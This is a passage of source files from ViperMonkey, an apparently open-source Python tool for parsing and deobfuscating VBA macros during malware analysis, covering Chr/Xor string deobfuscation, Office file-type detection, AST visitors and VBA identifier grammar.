IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 57 | 58 | # Only do this if the regex library was successfully imported. 59 | if REGEX: 60 | 61 | # language=PythonRegExp 62 | CHR = regex.compile('Chr\((?P\d+)(\s+Xor\s+(?P\d+))*\)', regex.IGNORECASE) 63 | # language=PythonRegExp 64 | STRING = regex.compile('(".*?"|\'.*?.\')') 65 | 66 | # Long run of Chr() and "string" concatenations. 67 | # e.g: Chr(71 Xor 18) & "2" & Chr(82 Xor 4) + "0" & Chr(70 Xor 15) & Chr(84 Xor 19) 68 | # NOTE: We are allowing the use of "+" because it has the same affect as "&" when dealing 69 | # with just strings and order precedence shouldn't matter in this case. 70 | # language=PythonRegExp 71 | CONCAT_RUN = regex.compile( 72 | '(?P{chr}|{string})(\s+[&+]\s+(?P{chr}|{string}))*'.format( 73 | chr=CHR.pattern, string=STRING.pattern)) 74 | 75 | # Long run of variable concatination split among lines. 76 | # e.g. 77 | # a = '1' 78 | # a = a & '2' 79 | # a = a & '3' 80 | # language=PythonVerboseRegExp 81 | VAR_RUN = regex.compile(''' 82 | (?P[A-Za-z][A-Za-z0-9]*)\s*?=\s*(?P.*?)[\r\n] # variable = * 83 | (\s*?(?P=var)\s*=\s*(?P=var)\s+&\s+(?P.*?)[\r\n])+ # variable = variable & * 84 | ''', regex.VERBOSE) 85 | 86 | 87 | def _replace_code(code, replacements): 88 | """Replaces code with new code. 89 | 90 | @param code (str) The code to replace. 91 | 92 | @param replacements (list) List of tuples containing (start, 93 | end, replacement). 94 | 95 | @return (str) The modified code. 96 | """ 97 | new_code = '' 98 | index = 0 99 | for start, end, code_string in sorted(replacements): 100 | new_code += code[index:start] + code_string 101 | index = end 102 | new_code += code[index:] 103 | return new_code 104 | 105 | 106 | def _replace_var_runs(code): 107 | """Replace long variable runs. 108 | 109 | @param code (str) The code to replace. 110 | 111 | @return (str) The modified code. 112 | """ 113 | code_replacements = [] 114 | for match in VAR_RUN.finditer(code): 115 | code_string = '{var} = {value}{newline}'.format( 116 | var=match.group('var'), 117 | value=' & '.join(match.captures('entry')), 118 | newline=match.group(0)[-1] # match \r or \n as used in code. 119 | ) 120 | code_replacements.append((match.start(), match.end(), code_string)) 121 | return _replace_code(code, code_replacements) 122 | 123 | 124 | 125 | def _replace_concat_runs(code): 126 | """Replace long chr runs. 127 | 128 | @param code (str) The code to replace. 129 | 130 | @return (str) The modified code. 131 | """ 132 | code_replacements = [] 133 | for match in CONCAT_RUN.finditer(code): 134 | code_string = '' 135 | for entry in match.captures('entry'): 136 | sub_match = CHR.match(entry) 137 | if sub_match: 138 | character = chr(reduce(xor, map(int, sub_match.captures('op')))) 139 | # Escape if its a quote. 140 | if character == '"': 141 | character = '""' 142 | code_string += character 143 | else: 144 | code_string += entry.strip('\'"') 145 | code_replacements.append((match.start(), match.end(), '"{}"'.format(code_string))) 146 | return _replace_code(code, code_replacements) 147 | 148 | 149 | def deobfuscate(code): 150 | """Deobfuscates VBA code. 151 | 152 | @param code (str) Obfuscated VBA code. 153 | 154 | @return (str) Deobfuscated code. 155 | 156 | """ 157 | code = vba_collapse_long_lines(code) 158 | if REGEX: 159 | code = _replace_var_runs(code) 160 | code = _replace_concat_runs(code) 161 | else: 162 | log.warning('regex package is not installed - impossible to deobfuscate') 163 | return code 164 | -------------------------------------------------------------------------------- /vipermonkey/core/filetype.py: -------------------------------------------------------------------------------- 1 | """ 2 | Check for Office file types 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | # Office magic numbers. 40 | magic_nums = { 41 | "office97" : "D0 CF 11 E0 A1 B1 1A E1", # Office 97 42 | "office2007" : "50 4B 3 4", # Office 2007+ (PKZip) 43 | } 44 | 45 | # PE magic number. 46 | pe_magic_num = "4D 5A" 47 | 48 | def get_1st_8_bytes(fname, is_data): 49 | 50 | info = None 51 | is_data = (is_data or (len(fname) > 200)) 52 | if (not is_data): 53 | try: 54 | tmp = open(fname, 'rb') 55 | tmp.close() 56 | except: 57 | is_data = True 58 | if (not is_data): 59 | with open(fname, 'rb') as f: 60 | info = f.read(8) 61 | else: 62 | info = fname[:9] 63 | 64 | curr_magic = "" 65 | for b in info: 66 | curr_magic += hex(ord(b)).replace("0x", "").upper() + " " 67 | 68 | return curr_magic 69 | 70 | def is_pe_file(fname, is_data): 71 | """ 72 | Check to see if the given file is a PE executable. 73 | 74 | return - True if it is a PE file, False if not. 75 | """ 76 | 77 | # Read the 1st 8 bytes of the file. 78 | curr_magic = get_1st_8_bytes(fname, is_data) 79 | 80 | # See if we the known magic #. 81 | return (curr_magic.startswith(pe_magic_num)) 82 | 83 | def is_office_file(fname, is_data): 84 | """ 85 | Check to see if the given file is a MS Office file format. 86 | 87 | return - True if it is an Office file, False if not. 88 | """ 89 | 90 | # Read the 1st 8 bytes of the file. 91 | curr_magic = get_1st_8_bytes(fname, is_data) 92 | 93 | # See if we have 1 of the known magic #s. 94 | for typ in magic_nums.keys(): 95 | magic = magic_nums[typ] 96 | if (curr_magic.startswith(magic)): 97 | return True 98 | return False 99 | 100 | def is_office97_file(fname, is_data): 101 | 102 | # Read the 1st 8 bytes of the file. 103 | curr_magic = get_1st_8_bytes(fname, is_data) 104 | 105 | # See if we have the Office97 magic #. 106 | return (curr_magic.startswith(magic_nums["office97"])) 107 | 108 | def is_office2007_file(fname, is_data): 109 | 110 | # Read the 1st 8 bytes of the file. 111 | curr_magic = get_1st_8_bytes(fname, is_data) 112 | 113 | # See if we have the Office 2007 magic #. 114 | return (curr_magic.startswith(magic_nums["office2007"])) 115 | -------------------------------------------------------------------------------- /vipermonkey/core/from_unicode_str.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: VBA Library 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | __version__ = '0.02' 40 | 41 | class from_unicode_str(str): 42 | """ 43 | Marker class to mark strings created by StrConv() with the 44 | vbaFromUnicode option. VipeMonkey currently assumes that unless 45 | specifically noted, all strings are unicode. This class is used to 46 | mark strings that are pure ascii, not unicode. 47 | """ 48 | pass 49 | -------------------------------------------------------------------------------- /vipermonkey/core/function_call_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of all called functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | 41 | class function_call_visitor(visitor): 42 | """ 43 | Collect the names of all called functions. 44 | """ 45 | 46 | def __init__(self): 47 | self.called_funcs = set() 48 | self.visited = set() 49 | 50 | def visit(self, item): 51 | 52 | import statements 53 | import expressions 54 | import lib_functions 55 | 56 | if (item in self.visited): 57 | return False 58 | self.visited.add(item) 59 | if (isinstance(item, statements.Call_Statement)): 60 | if (not isinstance(item.name, expressions.MemberAccessExpression)): 61 | self.called_funcs.add(str(item.name)) 62 | if (isinstance(item, expressions.Function_Call)): 63 | self.called_funcs.add(str(item.name)) 64 | if (isinstance(item, statements.File_Open)): 65 | self.called_funcs.add("Open") 66 | if (isinstance(item, statements.Print_Statement)): 67 | self.called_funcs.add("Print") 68 | if (isinstance(item, lib_functions.Chr)): 69 | self.called_funcs.add("Chr") 70 | if (isinstance(item, lib_functions.Asc)): 71 | self.called_funcs.add("Asc") 72 | if (isinstance(item, lib_functions.StrReverse)): 73 | self.called_funcs.add("StrReverse") 74 | if (isinstance(item, lib_functions.Environ)): 75 | self.called_funcs.add("Environ") 76 | return True 77 | -------------------------------------------------------------------------------- /vipermonkey/core/function_defn_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of locally defined functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | 40 | # === IMPORTS ================================================================ 41 | 42 | import os, sys 43 | 44 | # IMPORTANT: it must be possible to run vipermonkey tools directly as scripts 45 | # in any directory without installing with pip or setup.py, for tests during 46 | # development 47 | # In that case, relative imports are NOT usable. 48 | # And to enable Python 2+3 compatibility, we need to use absolute imports, 49 | # so we add the vipermonkey parent folder to sys.path (absolute+normalized path): 50 | _thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) 51 | # print('_thismodule_dir = %r' % _thismodule_dir) 52 | # we are in vipermonkey/core 53 | _parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '../..')) 54 | # print('_parent_dir = %r' % _parent_dir) 55 | if _parent_dir not in sys.path: 56 | sys.path.insert(0, _parent_dir) 57 | 58 | from vipermonkey.core import * 59 | 60 | 61 | class function_defn_visitor(visitor): 62 | """ 63 | Collect the names of all locally declared functions. 64 | """ 65 | 66 | def __init__(self): 67 | self.funcs = set() 68 | self.func_objects = set() 69 | self.visited = set() 70 | 71 | def visit(self, item): 72 | if (item in self.visited): 73 | return False 74 | self.visited.add(item) 75 | if ((isinstance(item, procedures.Sub)) or 76 | (isinstance(item, procedures.Function)) or 77 | (isinstance(item, procedures.PropertyLet))): 78 | self.funcs.add(str(item.name)) 79 | self.func_objects.add(item) 80 | return True 81 | -------------------------------------------------------------------------------- /vipermonkey/core/function_import_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of locally defined functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from procedures import * 41 | 42 | class function_import_visitor(visitor): 43 | """ 44 | Collect the names and aliases of all functions imported from DLLs. 45 | """ 46 | 47 | def __init__(self): 48 | self.names = set() 49 | self.aliases = set() 50 | self.funcs = {} 51 | self.visited = set() 52 | 53 | def visit(self, item): 54 | if (item in self.visited): 55 | return False 56 | self.visited.add(item) 57 | if (isinstance(item, External_Function)): 58 | self.funcs[str(item.name)] = str(item.alias_name) 59 | self.names.add(str(item.alias_name)) 60 | self.aliases.add(str(item.name)) 61 | return True 62 | -------------------------------------------------------------------------------- /vipermonkey/core/identifiers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Identifiers 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | import re 40 | 41 | __version__ = '0.02' 42 | 43 | # ------------------------------------------------------------------------------ 44 | # TODO: 45 | 46 | # --- IMPORTS ------------------------------------------------------------------ 47 | 48 | from pyparsing import * 49 | from reserved import * 50 | from logger import log 51 | 52 | # TODO: reduce this list when corresponding statements are implemented 53 | # Handling whitespace in the RE version of reserved_keywords is a nightmare. Track this with a keyword list. 54 | reserved_keywords = CaselessKeyword("ChrB") | \ 55 | CaselessKeyword("ChrB") | \ 56 | CaselessKeyword("ChrW") | \ 57 | CaselessKeyword("Asc") | \ 58 | CaselessKeyword("Case") | \ 59 | CaselessKeyword("On") | \ 60 | CaselessKeyword("Sub") | \ 61 | CaselessKeyword("If") | \ 62 | CaselessKeyword("Then") | \ 63 | CaselessKeyword("For") | \ 64 | CaselessKeyword("Next") | \ 65 | CaselessKeyword("Public") | \ 66 | CaselessKeyword("Private") | \ 67 | CaselessKeyword("Declare") | \ 68 | CaselessKeyword("Function") | \ 69 | CaselessKeyword("To") 70 | # CaselessKeyword("End") | \ 71 | 72 | strict_reserved_keywords = reserved_keywords | \ 73 | Regex(re.compile('Open', re.IGNORECASE)) | \ 74 | Regex(re.compile('While', re.IGNORECASE)) 75 | 76 | # --- IDENTIFIER ------------------------------------------------------------- 77 | 78 | # TODO: see MS-VBAL 3.3.5 page 33 79 | # 3.3.5 Identifier Tokens 80 | # 81 | # MS-GRAMMAR: Latin-identifier = first-Latin-identifier-character *subsequent-Latin-identifier-character 82 | # MS-GRAMMAR: first-Latin-identifier-character = (%x0041-005A / %x0061-007A) ; A-Z / a-z 83 | # MS-GRAMMAR: subsequent-Latin-identifier-character = first-Latin-identifier-character / DIGIT / %x5F ; underscore 84 | # MS-GRAMMAR: identifier = expression 85 | 86 | general_identifier = Word(initChars=alphas + alphas8bit + '_' + '?', bodyChars=alphanums + '_' + '?' + alphas8bit) + \ 87 | Suppress(Optional("^")) + Suppress(Optional("%")) + Suppress(Optional("!...")) 88 | 89 | # MS-GRAMMAR: lex-identifier = Latin-identifier / codepage-identifier / Japanese-identifier / 90 | # MS-GRAMMAR: Korean-identifier / simplified-Chinese-identifier / traditional-Chinese-identifier 91 | # TODO: add other identifier types 92 | lex_identifier = general_identifier | Regex(r"%\w+%") | "..." 93 | 94 | # 3.3.5.2 Reserved Identifiers and IDENTIFIER 95 | # IDENTIFIER = 96 | 97 | identifier = NotAny(reserved_identifier) + lex_identifier 98 | 99 | # convert identifier to a string: 100 | identifier.setParseAction(lambda t: t[0]) 101 | 102 | # --- ENTITY NAMES ----------------------------------------------------------- 103 | 104 | # 3.3.5.3 Special Identifier Forms 105 | # 106 | # MS-GRAMMAR: FOREIGN-NAME = "[" foreign-identifier "]" 107 | # MS-GRAMMAR: foreign-identifier = 1*non-line-termination-character 108 | # 109 | # A is a token (section 3.3) that represents a text sequence that is used as if it 110 | # was an identifier but which does not conform to the VBA rules for forming an identifier. Typically, a 111 | # is used to refer to an entity (section 2.2) that is created using some 112 | # programming language other than VBA. 113 | 114 | foreign_name = Literal('[') + CharsNotIn('\x0D\x0A') + Literal(']') 115 | 116 | # MS-GRAMMAR: BUILTIN-TYPE = reserved-type-identifier / ("[" reserved-type-identifier "]") 117 | # / "object" / "[object]" 118 | 119 | builtin_type = reserved_type_identifier | (Suppress("[") + reserved_type_identifier + Suppress("]")) \ 120 | | CaselessKeyword("object") | CaselessLiteral("[object]") 121 | 122 | # A is an that is immediately followed by a with no 123 | # intervening whitespace. 124 | # Declared Type 125 | # % Integer 126 | # & Long 127 | # ^ LongLong 128 | # ! Single 129 | # # Double 130 | # @ Currency 131 | # $ String 132 | # Don't parse 'c&' in 'c& d& e' as a typed_name. It's a string concat. 133 | type_suffix = Word(r"%&^!#@$", exact=1) + \ 134 | NotAny(Optional(Regex(r" +")) + ((NotAny(reserved_keywords) + Word(alphanums)) | '"')) 135 | typed_name = Combine(identifier + type_suffix) 136 | 137 | # 5.1 Module Body Structure 138 | # Throughout this specification the following common grammar rules are used for expressing various 139 | # forms of entity (section 2.2) names: 140 | # TODO: for now, disabled foreign_name 141 | untyped_name = identifier #| foreign_name 142 | # NOTE: here typed_name must come before untyped_name 143 | entity_name = typed_name | untyped_name 144 | unrestricted_name = entity_name | reserved_identifier 145 | 146 | # --- TODO IDENTIFIER OR OBJECT.ATTRIB ---------------------------------------- 147 | 148 | base_attrib = Combine( 149 | NotAny(reserved_keywords) 150 | + (Combine(Literal('.') + lex_identifier) | Combine(entity_name + Optional(Literal('.') + lex_identifier))) 151 | + Optional(CaselessLiteral('$')) 152 | + Optional(CaselessLiteral('#')) 153 | + Optional(CaselessLiteral('%')) 154 | ) 155 | 156 | TODO_identifier_or_object_attrib = base_attrib ^ Suppress(Literal("{")) + base_attrib + Suppress(Literal("}")) 157 | 158 | base_attrib_loose = Combine( 159 | Combine(Literal('.') + lex_identifier) 160 | | Combine(entity_name + Optional(Literal('.') + lex_identifier)) 161 | + Optional(CaselessLiteral('$')) 162 | + Optional(CaselessLiteral('#')) 163 | + Optional(CaselessLiteral('%')) 164 | | Combine(entity_name + Literal('.') + lex_identifier + Literal('.') + lex_identifier) 165 | ) 166 | 167 | TODO_identifier_or_object_attrib_loose = base_attrib_loose ^ Suppress(Literal("{")) + base_attrib_loose + Suppress(Literal("}")) 168 | 169 | enum_val_id = Regex(re.compile(r"\[[^\]]+\]")) 170 | -------------------------------------------------------------------------------- /vipermonkey/core/let_statement_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting Let statements. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | 41 | class let_statement_visitor(visitor): 42 | """ 43 | Get all Let statements. 44 | """ 45 | 46 | def __init__(self, var_name=None): 47 | self.let_statements = set() 48 | self.visited = set() 49 | self.var_name = var_name 50 | 51 | def visit(self, item): 52 | from statements import Let_Statement 53 | if (item in self.visited): 54 | return False 55 | self.visited.add(item) 56 | if ((isinstance(item, Let_Statement)) and 57 | ((self.var_name is None) or (item.name == self.var_name))): 58 | self.let_statements.add(item) 59 | return True 60 | -------------------------------------------------------------------------------- /vipermonkey/core/lhs_var_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting variables on the LHS of assignments. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), 